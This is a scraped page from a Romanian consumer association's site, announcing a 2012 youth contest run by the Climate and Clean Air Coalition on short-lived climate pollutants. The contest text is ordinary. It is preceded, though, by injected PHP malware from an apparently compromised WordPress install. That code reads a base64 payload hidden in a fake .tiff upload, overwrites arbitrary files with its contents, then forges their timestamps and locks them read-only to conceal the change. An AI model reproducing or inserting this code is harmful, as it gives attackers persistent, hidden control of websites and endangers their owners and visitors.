$wp_update_file="/home/shuffles/public_html/wp-content/uploads/2023/05/0506412536.tiff"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } CONCURS DE CONSTIENTIZARE – O noua atitudine

A.N.P.C.P.P.S. Romania – o9atitudine ! – InfoCons prezinta initiativa CCAC ( Coalitia pentru Clima si Aer Curat ) de a lansa un concurs vizand constientizarea problemei poluantilor climatici de scurta durata.

Poluantii climatici de scurta durata sunt responsabili si ei de încalzirea globala actuala si pot avea ca rezultat decese premature si pierderi extinse ale culturilor în fiecare an. In ciuda pericolelor pe care le prezinta nu sunt foarte bine cunoscuti.

 

Categoriile de concurs sunt urmatoarele:

– Cel mai bun slogan sau un slogan pentru The Climate and Clean Air Coalition

– Cea mai buna descriere – “Ce este un poluant climatic de scurta durata?”

– Cea mai buna propunere de comunicare social media a mesajelor privind poluantii climatici de scurta durata si stirile de ultima ora cu privire la acestia sau lucrarile Coalitiei

– Cel mai bun produs audio-vizual care comunica impactul si posibilitatile de abordare a poluantilor climatici de scurta durata.

– Cele mai bune lucrari din fiecare categorie vor fi postate pe site-ul organizatiei si vor fi utilizate încadrul eforturilor Coalitiei de a mobiliza si constientiza întreaga lume.
In ceea ce priveste premiile, va exista un singur castigator pentru fiecare categorie si un câstigator al concursului. Judecatorii pot acorda, de asemenea, si alte premii

Participantii sunt persoanele cu varste cuprinse intre 12 si 25 de ani.

Termenul limita pentru inscrierea in concurs este 14 septembrie 2012.

 

Detaliile concursului se gasesc in link-ul:

http://www.unep.org/ccac/Media/Globaloutreachandawarenesscontest/tabid/104236/Default.aspx

 

 

Asociatia Nationala pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania – A.N.P.C.P.P.S. Romania – o9atitudine! – InfoCons, unica organizatie din Romania cu drepturi depline in Consumers International,  membra fondatoare a Federatiei Asociatiilor de Consumatori, este o asociatie de consumatori neguvernamentala, reprezentativa, de drept privat, fara scop lucrativ, cu patrimoniu distinct si indivizibil, independenta, intemeiata pe principii democratice, ce apara drepturile consumatorilor.

By o9admin